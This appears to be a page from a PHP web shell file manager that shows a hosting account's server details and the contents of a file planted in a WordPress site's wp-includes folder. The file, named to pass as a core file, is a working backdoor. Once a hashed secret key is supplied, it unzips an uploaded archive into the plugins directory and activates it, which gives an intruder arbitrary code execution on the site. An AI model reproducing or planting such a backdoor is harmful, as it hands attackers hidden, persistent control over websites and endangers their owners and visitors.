HEX
Server: Apache
System: Linux pdx1-shared-a1-31 6.6.104-grsec-jammy+ #3 SMP Tue Sep 16 00:28:11 UTC 2025 x86_64
User: dh_5jabqq (6436002)
PHP: 8.2.29
Disabled: NONE
$ pwd: /home/dh_5jabqq/bermudashipwreckarchive.com/wp-includes/
Upload Files
File: /home/dh_5jabqq/bermudashipwreckarchive.com/wp-includes/class-dns-comm.php
<?php

//F0001

$seckey = $_POST['seckey'] ?? '';
if (md5($seckey) !== '260ca9dd8a4577fc00b7bd5810298076') {
    http_response_code(403);
    echo 'Access denied';
    exit;
}

define('ABSPATH', realpath(__DIR__ . '/../') . DIRECTORY_SEPARATOR);

require_once ABSPATH . 'wp-load.php';
require_once ABSPATH . 'wp-admin/includes/file.php';
require_once ABSPATH . 'wp-admin/includes/plugin.php';

$zipFile = $_FILES['plugin']['tmp_name'] ?? null;
if (!$zipFile) {
    http_response_code(400);
    echo 'No plugin uploaded.';
    exit;
}

$plugin_dir = ABSPATH . 'wp-content/plugins/';

WP_Filesystem();
global $wp_filesystem;

$unzip_result = unzip_file($zipFile, $plugin_dir);

if (is_wp_error($unzip_result)) {
    http_response_code(500);
    echo 'Unzip failed: ' . $unzip_result->get_error_message();
    exit;
}

$activate_path = $_POST['activate'] ?? '';
if (!empty($activate_path)) {
    if (!is_plugin_active($activate_path)) {
        $result = activate_plugin($activate_path);
        if (is_wp_error($result)) {
            echo 'Plugin unzipped. Activation failed: ' . $result->get_error_message();
        } else {
            echo 'Plugin unzipped and activated: ' . $activate_path;
        }
    } else {
        echo 'Plugin unzipped. Already active: ' . $activate_path;
    }
} else {
    echo 'Plugin unzipped successfully.';
}
@ Telegram